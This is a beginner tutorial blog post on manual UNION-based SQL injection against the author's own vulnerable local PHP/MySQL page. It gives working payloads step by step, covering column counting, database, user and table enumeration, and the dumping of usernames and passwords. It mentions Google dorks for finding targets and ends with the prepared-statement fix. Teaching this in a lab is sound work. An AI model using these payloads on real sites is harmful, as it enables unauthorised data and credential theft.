
There are many articles on the internet about SQL injection, but most of them only give you the queries and never show the result each one produces. So here I have made a modest attempt to explain SQL injection for beginners. For this, I wrote my own webpage with an SQL injection flaw and hosted it locally on WampServer (Apache, PHP and MySQL). I hope this will help beginners understand SQL injection.

Imagine an attacker who finds this site through Google dorks (search queries that locate pages with a parameter such as id= in the URL) and lands on the page shown below.

[screenshot sqlb1]

The page displays some information about the company's founders. What happens when we click on "Founder 1"? It displays information about Founder 1, as shown below.

[screenshot sqlb2]

Notice the small change in the URL: it now ends with id=1. If we go back and click on "Founder 2", the page shows Founder 2 and the URL ends with id=2 instead. So the page takes the id value from the query string (in PHP, $_GET['id']) and uses it in a database query to fetch the record to display. Whether that value is inserted into the query safely is what we test next.

[screenshot sqlb3]

Let's see whether the page is vulnerable. In the address bar, append a single quote to the id value, like this:

id=1'

[screenshot sqlb4]

If you get a database error like the one above, the quote was spliced into the SQL statement unescaped, which is exactly what we need. The converse does not hold: a site that shows no error may still be injectable, with errors suppressed or only blind techniques available, but that is outside this post. Since we know this site is vulnerable, let's find the number of columns returned by the vulnerable query (not the number of columns in the database). Use the query

id=1 order by 1 

and increase the value  until you get an error, like below.

id=1 order by 2

id=1 order by 3

The last value that does not produce an error is the number of columns in the query's result. ORDER BY is normally used to sort results; given a number it sorts by that column position, so a position greater than the number of columns is an error. Sometimes you will see no error no matter how far you increase the value, as in the case below where I got no error all the way up to 15.

[screenshot sqlb5]

Either the query really has fifteen columns (very unlikely) or our ORDER BY is not being parsed as SQL at all. The usual reason is that the id value sits inside quotes in the query, so 1 order by 15 is read as part of the string literal and the clause never reaches the parser. Close the quote ourselves and comment out the rest of the original statement:

id=1' order by 1--+

With this form, the value 3 returns an error, as shown below. This means the query returns two columns.

[screenshot sqlb6]

 

If the quoted form works, use it all through the injection. The characters -- start a comment, so everything after them (the closing quote the application adds, and anything else) is ignored. MySQL requires whitespace after --, and the + in the URL is decoded to a space by the web server, which is why the payloads end in --+.

Now we know the query returns two columns. Let's find out which of them are displayed on the page (the "vulnerable" columns). Type

id=-1' union select 1,2--+

Setting id to -1 matches no existing row, so the only row the page renders is the one our UNION SELECT adds, and the numbers 1 and 2 appear wherever each column is printed. The vulnerable columns are displayed as below. Here both columns are shown, but you will not always be so lucky; only the positions that appear on the page can be used to read data out.

[screenshot sqlb7]

If the above query doesn't work, make the original WHERE clause false instead of relying on a non-existent id:

id=1' and 1=2 union select 1,2--+

[screenshot sqlb8]

Now let's find out the database version by placing version() in one of the displayed columns:

id=-1' union select version(),2--+

[screenshot sqlb9]

The version is 5.6.2-log, so this is MySQL (the -log suffix means one of the server logs is enabled). Now let's list the names of all databases on the server. MySQL exposes its catalogue through information_schema, and group_concat() joins all the rows into one comma-separated string so they fit in a single displayed column. Use the query

id=-1' union select group_concat(schema_name),2 from information_schema.schemata--+

This displays all databases. You can see the list below, including the dvwa database I used earlier for practice.

[screenshot sqlb10]

We know all the databases. Now let's see which one the website itself is using:

id=-1' union select database(),2--+

[screenshot sqlb11]

 

So shunya is the database used by the website. Let's see which database user the application connects as:

id=-1' union select user(),2--+

[screenshot sqlb12]

It is root, the default (and by default passwordless) MySQL account on WampServer, so the application runs with full database privileges. Now let's find the tables in the shunya database; the condition table_schema=database() restricts the listing to the current database:

id=-1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()--+

[screenshot sqlb13]

The only table is users. Now let's find the column names in the table users:

id=-1' union select group_concat(column_name),2 from information_schema.columns where table_schema=database()--+

[screenshot sqlb14]

We got the column names. Note that the query above lists the columns of every table in the current database; that is fine here because users is the only table, but on a real target add a condition on table_name as well so columns from different tables are not mixed together. Now let's dump the values of some interesting columns, username and password:

id=-1' union select group_concat(username,0x3a,password,0x3a),2 from users--+

[screenshot sqlb15]

We successfully dumped the usernames and passwords. The value 0x3a is the hex encoding of a colon, placed between the fields for readability; it is written as a hex literal because a quoted ':' would put another quote into the payload. Two practical caveats: group_concat() output is truncated at group_concat_max_len (1024 characters by default), so large tables have to be pulled out in pieces, and the password column here holds plaintext, which is a second flaw of this test site rather than something to count on elsewhere. Now let's dump all the values from the table users:

id=-1' union select group_concat(id,0x3a,name,0x3a,field,0x3a,username,0x3a,password),2 from users--+

[screenshot sqlb16]

We have successfully performed SQL injection and dumped the table. The root cause is that the application pastes the id value from the URL straight into its SQL statement; using prepared statements with bound parameters (mysqli or PDO in PHP) removes the bug entirely. Hope this was helpful.